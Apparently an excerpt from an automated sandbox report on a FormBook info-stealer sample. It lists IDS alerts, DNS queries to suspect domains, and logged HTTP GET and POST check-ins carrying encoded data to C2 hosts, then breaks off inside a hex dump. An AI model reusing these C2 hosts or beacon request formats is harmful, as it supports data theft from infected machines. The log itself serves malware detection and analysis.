Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49999 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49987 -> 47.254.140.255:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 134.122.133.80:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 136.243.64.147:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50000 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50000 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49980 -> 46.38.243.234:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49980 -> 46.38.243.234:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50008 -> 136.243.64.147:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50008 -> 136.243.64.147:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49985 -> 47.254.140.255:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50016 -> 134.122.133.80:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50016 -> 134.122.133.80:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49992 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49992 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50010 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 134.122.133.80:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49986 -> 47.254.140.255:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50018 -> 93.127.192.201:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49991 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50006 -> 136.243.64.147:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.fersigorta.xyz

Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: ASMUNDA-ASSC ASMUNDA-ASSC

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Code function: 0_2_00C822EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00C822EE

Source: global traffic	HTTP traffic detected: GET /blfv/?Bb6h7=gBiPvnrHa&V8=OYzX9ZD8JFvHop8tcVV8HuyU67NFgrHF6vfAGJLgGhZlSUdZ/OYKAWfRY9pPenrbZbnckt/3jffsXR68PKDW9Ecs4jeXW699fOhXXOdveN0uJ+M8ggMhXVa/XAWEfUcQVw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.f5jh81t3k1w8.sbsConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
Source: global traffic	HTTP traffic detected: GET /z8lg/?V8=d+u13dJhHOFzWIGSYGA26K0asZwGQ+354a/EjoVDUhr6ByY3LBq4B/TBSd/j0JaEFkEgokttXRJz3Nwxbwya2xH8ETEZDRfZixXgz51iFTfhRHR1qQVQUph6fdb1/VOV9g==&Bb6h7=gBiPvnrHa HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.lmueller.devConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
Source: global traffic	HTTP traffic detected: GET /nhb9/?V8=TPU4dumIi+D1nx6dGJD9W6GSZGJOmofRCRQtffc6GrD6UQOtZPepFdRZleg/11G771jgytlZx/KAXkWBKMhiKuCHTM0VrIEGohPTLQH2eOGOmwQk+g1Zd36VNj9HTWnDYA==&Bb6h7=gBiPvnrHa HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.valuault.storeConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
Source: global traffic	HTTP traffic detected: GET /rl5p/?Bb6h7=gBiPvnrHa&V8=U5nb6F2D+6Ub+BbGgn/WBcZABtiKGjnTMliNxQrWrtMhCM2XjoMK5ippUQtHm0xX3cajxvPhwbFvkKUzAaSZHL5crW9oCCkqzTfN0RC5pEjEcoIvYgKfrFT9zkKgJZ+CcA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.odvfr.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
Source: global traffic	HTTP traffic detected: GET /2a2y/?V8=zr0t7ULZxVzE+inLl39bbZB0JWpZLO1MICTJQG7tLn2thDr4Npa0BGL0Ak9UxK4o8AAox0GxcOxKU7Jm8nxF3e2PjP20+tvZNqonqnl/jekGCshc02lZKK7JWM700euXhA==&Bb6h7=gBiPvnrHa HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.fersigorta.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
Source: global traffic	HTTP traffic detected: GET /rjsl/?Bb6h7=gBiPvnrHa&V8=sx0gCczAFgj7YDMYbB9bVpPFqR0YAiUYulJ6hk/85bzVk72pU9tIUNjCR8r6jdWIfUnKZpAIPKdoUazogFVKlOHV8iazh43WTNlrbye2V7vv7YwuIZQBC8MvvBeXOotBVw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.vh5g.sbsConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
Source: global traffic	HTTP traffic detected: GET /8efo/?V8=T2NGoo7Qxcyqrqz3MX03hpQWSivm/Bj7gd/lPuHNqm/993Y45l+K5XkRQc/91P+Wf5o+Fy5PkbYLO4eQBkWEWabH/6z+kfBygbxby0fAgVFPJA+Djx5wnWVAkFd+F7WzDg==&Bb6h7=gBiPvnrHa HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.marketyemen.holdingsConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
Source: global traffic	HTTP traffic detected: GET /0pui/?V8=8E9ba00UjFo7PU/eEqgVWkIK94OcHqokbV3+SylgnD70KIDAP1aAQbV/7FCow/l5youCP7Vx0oTyvxMws++GcEtPIIait+3tzbwSXdRUlhYH624U7nSdIoyPDL7sOl16Zw==&Bb6h7=gBiPvnrHa HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.deacapalla.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
Source: global traffic	HTTP traffic detected: GET /tw42/?V8=lppBzHasG2q3W2gwBEigKs+lYs+CAuXKSLpv0GvBrwIC17Gf2xLaVk86ThwJgseC0DRvoxJH/zAsXU58KuU4W+pKTj7Ns/0A3sApM0dQZei9OXaCVa2j9SlaFImncTaD0Q==&Bb6h7=gBiPvnrHa HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.100millionjobs.africaConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
Source: global traffic	HTTP traffic detected: GET /j2vs/?Bb6h7=gBiPvnrHa&V8=ojS/2P5nrhKWG869xfViz2uaiQ4dB6fmN9sQwMDG5q6PFmCkgI7u5WRyoS939Z0WQWWR6oSqfY2a6i6yoynlWLywOB6FnF6t61mCd33fp8fgqeNJIahdroNOItErrJD4XA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.axis138ae.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
Source: global traffic	HTTP traffic detected: GET /iuei/?Bb6h7=gBiPvnrHa&V8=ueDaiuOcYsSp9Xkcl1oB9tm+tEnnENLgHwvKheTa7AKLOQ8fO2SBLqueUKoOI6xeDW+RE21fFYk3KnUadQilvOUj3f5vRoUOjIAyrnG2dTWXtM1xYmeCqswVLQjzw0rbHw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.x3kwqc5tye4vl90y.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
Source: global traffic	HTTP traffic detected: GET /qfbg/?V8=FozauU3I+LP/9Nj8g7b6dv8gCpZwHtVW5jJ9IM/S40uIbg9HP9G2UPrJfaUkURrP7SWnfEhe84Vk8Ui0+mXxkZIdFJ1enIwMA3s4LYaZdtjwXCRSGeLNYZPp7qU7y2jovw==&Bb6h7=gBiPvnrHa HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.al-madinatraders.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516

Source: global traffic	DNS traffic detected: DNS query: www.f5jh81t3k1w8.sbs
Source: global traffic	DNS traffic detected: DNS query: www.lmueller.dev
Source: global traffic	DNS traffic detected: DNS query: www.valdevez.net
Source: global traffic	DNS traffic detected: DNS query: www.valuault.store
Source: global traffic	DNS traffic detected: DNS query: www.odvfr.info
Source: global traffic	DNS traffic detected: DNS query: www.fersigorta.xyz
Source: global traffic	DNS traffic detected: DNS query: www.vh5g.sbs
Source: global traffic	DNS traffic detected: DNS query: www.envisionmedia.shop
Source: global traffic	DNS traffic detected: DNS query: www.marketyemen.holdings
Source: global traffic	DNS traffic detected: DNS query: www.deacapalla.online
Source: global traffic	DNS traffic detected: DNS query: www.100millionjobs.africa
Source: global traffic	DNS traffic detected: DNS query: www.elettrocoltura.info
Source: global traffic	DNS traffic detected: DNS query: www.axis138ae.shop
Source: global traffic	DNS traffic detected: DNS query: www.reynamart.store
Source: global traffic	DNS traffic detected: DNS query: www.x3kwqc5tye4vl90y.top
Source: global traffic	DNS traffic detected: DNS query: www.al-madinatraders.shop

Source: unknown

HTTP traffic detected: POST /z8lg/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-USHost: www.lmueller.devCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 203Origin: http://www.lmueller.devReferer: http://www.lmueller.dev/z8lg/User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516Data Raw: 56 38 3d 51 38 47 56 30 71 4e 45 62 66 63 4f 47 4a 6a 35 56 47 30 6a 6c 61 34 55 68 2b 56 66 61 65 62 50 75 73 32 58 7a 4e 77 41 58 51 2f 33 44 43 5a 30 61 53 53 54 4d 4f 72 50 4b 64 50 4a 33 37 57 4d 50 46 45 6a 70 45 55 54 4a 57 46 74 38 36 35 70 52 69 65 4b 33 54 76 69 66 54 45 6d 48 6e 33 4b 6a 6e 33 58 32 38 4a 6b 49 48 7a 76 62 31 73 67 7a 67 5a 54 55 59 6c 49 62 64 50 30 39 6e 48 6b 6e 78 32 6b 56 65 33 51 47 31 56 38 30 63 65 35 46 62 5a 32 4d 4a 65 66 58 76 37 67 57 4b 6e 30 2b 77 31 48 64 43 2b 68 56 6a 45 68 38 64 4f 72 51 38 47 30 56 61 56 6b 67 49 4c 6c 4e 6c 42 75 73 50 6b 4e 46 30 73 3d Data Ascii: V8=Q8GV0qNEbfcOGJj5VG0jla4Uh+VfaebPus2XzNwAXQ/3DCZ0aSSTMOrPKdPJ37WMPFEjpEUTJWFt865pRieK3TvifTEmHn3Kjn3X28JkIHzvb1sgzgZTUYlIbdP09nHknx2kVe3QG1V80ce5FbZ2MJefXv7gWKn0+w1HdC+hVjEh8dOrQ8G0VaVkgILlNlBusPkNF0s=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 15:41:47 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 15:39:22 GMTServer: Apache/2.4.10 (Debian)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6d 75 65 6c 6c 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.lmueller.dev Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 15:39:25 GMTServer: Apache/2.4.10 (Debian)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6d 75 65 6c 6c 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.lmueller.dev Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 15:39:27 GMTServer: Apache/2.4.10 (Debian)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6d 75 65 6c 6c 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.lmueller.dev Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 15:39:30 GMTServer: Apache/2.4.10 (Debian)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6d 75 65 6c 6c 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.lmueller.dev Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 15:42:25 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 